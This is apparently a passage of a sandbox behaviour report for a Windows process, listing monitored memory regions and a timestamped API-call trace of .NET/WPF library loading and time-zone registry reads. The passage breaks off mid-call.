region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2846 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2847 start_va = 0x5210000 end_va = 0x521ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 2848 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2849 start_va = 0x56b0000 end_va = 0x57affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 2851 start_va = 0x5200000 end_va = 0x5202fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005200000" filename = "" Region: id = 2856 start_va = 0x5200000 end_va = 0x5201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005200000" filename = "" Region: id = 2857 start_va = 0x5210000 end_va = 0x5210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005210000" filename = "" Region: id = 2858 start_va = 0x5220000 end_va = 0x5221fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 2859 start_va = 0x57b0000 end_va = 0x5879fff monitored = 0 entry_point = 0x57b21f0 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 2860 start_va = 0x5220000 end_va = 0x5221fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 2861 start_va = 0x57b0000 end_va = 0x5879fff monitored = 0 entry_point = 0x57b21f0 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 2862 start_va = 0x5220000 end_va = 0x5224fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 2863 start_va = 0x5230000 end_va = 0x523ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 2864 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2865 start_va = 0x5250000 end_va = 0x525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 2866 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2867 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 2868 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2869 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2870 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2871 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2872 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2873 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 2874 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2875 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2876 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2877 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2878 start_va = 0x65a10000 end_va = 0x65ac5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Security\\4e4cb6e2e651b6d243241e4edd14b3f3\\System.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.security\\4e4cb6e2e651b6d243241e4edd14b3f3\\system.security.ni.dll") Region: id = 2879 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2880 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 2881 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3299 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3301 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3303 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3304 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3305 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3306 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3307 start_va = 0x5270000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3308 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3309 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3310 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3311 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3312 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3313 start_va = 0x57b0000 end_va = 0x5ca1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 3314 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3315 start_va = 0x5cb0000 end_va = 0x61a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 3316 start_va = 0x61b0000 end_va = 0x66a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000061b0000" filename = "" Region: id = 3317 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3318 start_va = 0x65890000 end_va = 0x65a02fff monitored = 0 entry_point = 0x6593d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 3319 start_va = 0x66b0000 end_va = 0x67affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066b0000" filename = "" Region: id = 3320 start_va = 0x67b0000 end_va = 0x6854fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067b0000" filename = "" Region: id = 3321 start_va = 0x67b0000 end_va = 0x67effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067b0000" filename = "" Region: id = 3322 start_va = 0x67f0000 end_va = 0x68effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067f0000" filename = "" Region: id = 3323 start_va = 0x5270000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3324 start_va = 0x5270000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3325 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3326 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3327 start_va = 0x5290000 end_va = 0x529ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 3328 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3329 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3330 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3331 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3332 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3333 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 3334 start_va = 0x5280000 end_va = 0x5290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005280000" filename = "" Region: id = 3335 start_va = 0x64b70000 end_va = 0x64c14fff monitored = 0 entry_point = 0x64b8ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 3336 start_va = 0x64b40000 end_va = 0x64b62fff monitored = 0 entry_point = 0x64b45570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 3337 start_va = 0x6cd70000 end_va = 0x6cd7ffff monitored = 0 entry_point = 0x6cd73820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 3338 start_va = 0x57b0000 end_va = 0x588ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3339 start_va = 0x5890000 end_va = 0x58cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005890000" filename = "" Region: id = 3340 start_va = 0x58d0000 end_va = 0x59cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 3341 start_va = 0x706a0000 end_va = 0x7073afff monitored = 0 entry_point = 0x706df7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3342 start_va = 0x70740000 end_va = 0x70751fff monitored = 0 entry_point = 0x70744510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3343 start_va = 0x71f80000 end_va = 0x71faefff monitored = 0 entry_point = 0x71f8bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3344 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3345 start_va = 0x71f00000 end_va = 0x71f12fff monitored = 0 entry_point = 0x71f025d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 3346 start_va = 0x71ee0000 end_va = 0x71ef3fff monitored = 0 entry_point = 0x71ee3c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 3347 start_va = 0x59d0000 end_va = 0x5a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059d0000" filename = "" Region: id = 3348 start_va = 0x5a10000 end_va = 0x5b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a10000" filename = "" Region: id = 3349 start_va = 0x5b10000 end_va = 0x5b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b10000" filename = "" Region: id = 3350 start_va = 0x5b50000 end_va = 0x5c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b50000" filename = "" Region: id = 3351 start_va = 0x724f0000 end_va = 0x7263afff monitored = 0 entry_point = 0x72551660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3352 start_va = 0x5c50000 end_va = 0x5c53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3353 start_va = 0x5c60000 end_va = 0x5ca4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 3354 start_va = 0x5cb0000 end_va = 0x5cb3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3355 start_va = 0x5cc0000 end_va = 0x5d4dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 3356 start_va = 0x5d50000 end_va = 0x614afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 3357 start_va = 0x6150000 end_va = 0x6153fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3358 start_va = 0x6160000 end_va = 0x6176fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 3359 start_va = 0x6180000 end_va = 0x6180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 3360 start_va = 0x717f0000 end_va = 0x7196dfff monitored = 0 entry_point = 0x7186c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3361 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3362 start_va = 0x6150000 end_va = 0x6150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006150000" filename = "" Region: id = 3363 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3364 start_va = 0x7faa0000 end_va = 0x7fe40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 3471 start_va = 0x6190000 end_va = 0x6193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3532 start_va = 0x7fdd0000 end_va = 0x7fe4dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Thread: id = 6 os_tid = 0xafc [0213.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0213.616] RoInitialize () returned 0x1 [0213.616] RoUninitialize () returned 0x0 [0221.041] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x6077c8 [0221.478] ??2@YAPAXI@Z () returned 0x618b68 [0222.698] SetProcessDPIAware () returned 1 [0222.702] GetEnvironmentVariableW (in: lpName="COMPLUS_Version", lpBuffer=0x19cd70, nSize=0x104 | out: lpBuffer="") returned 0x0 [0222.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Net Framework Setup\\NDP\\v4\\Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x19cd4c | out: phkResult=0x19cd4c*=0x228) returned 0x0 [0222.721] RegQueryValueExW (in: hKey=0x228, lpValueName="InstallPath", lpReserved=0x0, lpType=0x19cd48, lpData=0x19cfa4, lpcbData=0x19cd44*=0x208 | out: lpType=0x19cd48*=0x1, lpData="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpcbData=0x19cd44*=0x5e) returned 0x0 [0222.722] RegCloseKey (hKey=0x228) returned 0x0 [0222.732] PathAppendW (in: pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", pMore="WPF" | out: pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF") returned 1 [0222.733] PathCombineW (in: pszDest=0x19d1ac, pszDir="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF", pszFile="wpftxt_v0400.dll" | out: pszDest="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpftxt_v0400.dll") returned="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpftxt_v0400.dll" [0222.734] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0222.734] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0222.734] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x4) returned 0xdb [0222.735] VerifyVersionInfoW (in: lpVersionInformation=0x19ce60, dwTypeMask=0x7, dwlConditionMask=0xdb | out: lpVersionInformation=0x19ce60) returned 1 [0222.736] LoadLibraryW (lpLibFileName="dwrite.dll") returned 0x6d4e0000 [0223.100] GetProcAddress (hModule=0x6d4e0000, lpProcName="DWriteCreateFactory") returned 0x6d55e750 [0223.101] PathCombineW (in: pszDest=0x19cd78, pszDir="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF", pszFile="wpfgfx_v0400.dll" | out: pszDest="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpfgfx_v0400.dll") returned="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpfgfx_v0400.dll" [0223.101] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpfgfx_v0400.dll") returned 0x6cf70000 [0224.539] PathCombineW (in: pszDest=0x19cd78, pszDir="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF", pszFile="PresentationNative_v0400.dll" | out: pszDest="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\PresentationNative_v0400.dll") returned="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\PresentationNative_v0400.dll" [0224.539] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\PresentationNative_v0400.dll") returned 0x6cea0000 [0225.547] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19f098 | out: pTimeZoneInformation=0x19f098) returned 0x2 [0225.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f17c | out: phkResult=0x19f17c*=0x268) returned 0x0 [0225.566] RegQueryValueExW (in: hKey=0x268, lpValueName="TZI", lpReserved=0x0, lpType=0x19f198, lpData=0x0, lpcbData=0x19f194*=0x0 | out: lpType=0x19f198*=0x3, lpData=0x0, lpcbData=0x19f194*=0x2c) returned 0x0 [0225.567] RegQueryValueExW (in: hKey=0x268, lpValueName="TZI", lpReserved=0x0, lpType=0x19f198, lpData=0x2096364, lpcbData=0x19f194*=0x2c | out: lpType=0x19f198*=0x3, lpData=0x2096364*, lpcbData=0x19f194*=0x2c) returned 0x0 [0225.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19efd0 | out: phkResult=0x19efd0*=0x0) returned 0x2 [0225.570] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f170, lpData=0x0, lpcbData=0x19f16c*=0x0 | out: lpType=0x19f170*=0x1, lpData=0x0, lpcbData=0x19f16c*=0x20) returned 0x0 [0225.571] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f170, lpData=0x20968a0, lpcbData=0x19f16c*=0x20 | out: lpType=0x19f170*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19f16c*=0x20) returned 0x0 [0225.571] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f170, lpData=0x0, lpcbData=0x19f16c*=0x0 | out: lpType=0x19f170*=0x1, lpData=0x0, lpcbData=0x19f16c*=0x20) returned 0x0 [0225.571] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f170, lpData=0x20968f8, lpcbData=0x19f16c*=0x20 | out: lpType=0x19f170*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19f16c*=0x20) returned 0x0 [0225.571] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f170, lpData=0x0, lpcbData=0x19f16c*=0x0 | out: lpType=0x19f170*=0x1, lpData=0x0, lpcbData=0x19f16c*=0x20) returned 0x0 [0225.571] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f170, lpData=0x2096950, lpcbData=0x19f16c*=0x20 | out: lpType=0x19f170*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19f16c*=0x20) returned 0x0 [0225.618] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.618] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x62cc10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0225.628] CoTaskMemFree (pv=0x62cc10) [0225.630] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.630] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath=0x62cc10, pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184 | out: pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184) returned 1 [0225.652] CoTaskMemFree (pv=0x0) [0225.652] CoTaskMemFree (pv=0x62cc10) [0225.652] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x45a0001 [0225.670] CoTaskMemAlloc (cb=0x3ec) returned 0x613ab8 [0225.670] LoadStringW (in: hInstance=0x45a0001, uID=0x140, lpBuffer=0x613ab8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0225.671] CoTaskMemFree (pv=0x613ab8) [0225.671] FreeLibrary (hLibModule=0x45a0001) returned 1 [0225.672] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.672] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x62cc10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0225.672] CoTaskMemFree (pv=0x62cc10) [0225.672] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.672] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath=0x62cc10, pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184 | out: pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184) returned 1 [0225.675] CoTaskMemFree (pv=0x0) [0225.675] CoTaskMemFree (pv=0x62cc10) [0225.676] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x45a0001 [0225.679] CoTaskMemAlloc (cb=0x3ec) returned 0x613ab8 [0225.679] LoadStringW (in: hInstance=0x45a0001, uID=0x142, lpBuffer=0x613ab8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0225.679] CoTaskMemFree (pv=0x613ab8) [0225.679] FreeLibrary (hLibModule=0x45a0001) returned 1 [0225.680] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.680] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x62cc10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0225.680] CoTaskMemFree (pv=0x62cc10) [0225.680] CoTaskMemAlloc (cb=0x20c) returned 0x62cc10 [0225.680] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath=0x62cc10, pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184 | out: pwszLanguage=0x0, pcchLanguage=0x19f18c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f190, pululEnumerator=0x19f184) returned 1 [0225.683] CoTaskMemFree (pv=0x0) [0225.683] CoTaskMemFree (pv=0x62cc10) [0225.683] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", 